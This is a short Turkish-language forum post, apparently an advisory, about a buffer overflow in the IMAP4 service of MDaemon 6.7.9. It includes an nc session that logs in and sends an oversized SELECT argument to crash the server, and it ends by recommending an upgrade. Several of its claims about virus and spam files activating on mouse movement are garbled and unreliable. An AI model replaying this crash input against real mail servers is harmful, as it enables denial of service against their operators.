Mdaemon Mail server Açığı

w133

тσ яєαℓιz&#
Katılım
18 Haz 2005
Mesajlar
1,436
Reaction score
0
Puanları
0
Yaş
40
Konum
www.imagestr.com
Problem ise şu :

Buffer Overflow in the IMAP4 protocol, within the
IMAP4rev1 MDaemon 6.7.9,
Bu hata makinan ın restart çekmesine neden oluyor.

Yazılmış dosyaları ise bi dosyaya kopyalıyor.

Etkilenmiş sistemler:

* IMAP4rev1 MDaemon 6.7.9

Immune systems:
* IMAP4rev1 MDaemon 6.8.0

Bu açıkla neler yapılabilir?

Bu açıkla attacker yani er elinde ki tüm spam ve virüslğ dosyaları kısa bi zaman da makinaya gönderebilir ve makinanın restart çekmesine sebeb olabilir.

Makina resetlendikten sonra dolayısıyla server kullanılamaz hale gelir.

Transcript


nc infowarfare.dk 143
* OK IMAP4rev1 MDaemon 6.7.9
0000 CAPABILITY
* CAPABILITY IMAP4rev1 NAMESPACE AUTH=CRAM-MD5 IDLE ACL
0000 OK CAPABILITY completed
0001 LOGIN "RealUser infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[2500 Bytes]...aaaa"


Bu atak eğer başarılı bi şekilde uygulanır sa windows kapanıcaktır.

Bu dosyalar Kurban ın ilk olarak bilgisayarın da görüneceketir.Mouse oynatması ile spam ve virus dosyaları devereye girecek ve windows kapanacaktır.

Bu olay o kadar kısa bi zaman da gerçekleştirilir ki gözlerini ze inanamayabilirsiniz.

0 milliseconds a virus devreye girecektir.

İşlev alanı


Upgrade higher then 6.7.9
 
Geri
Üst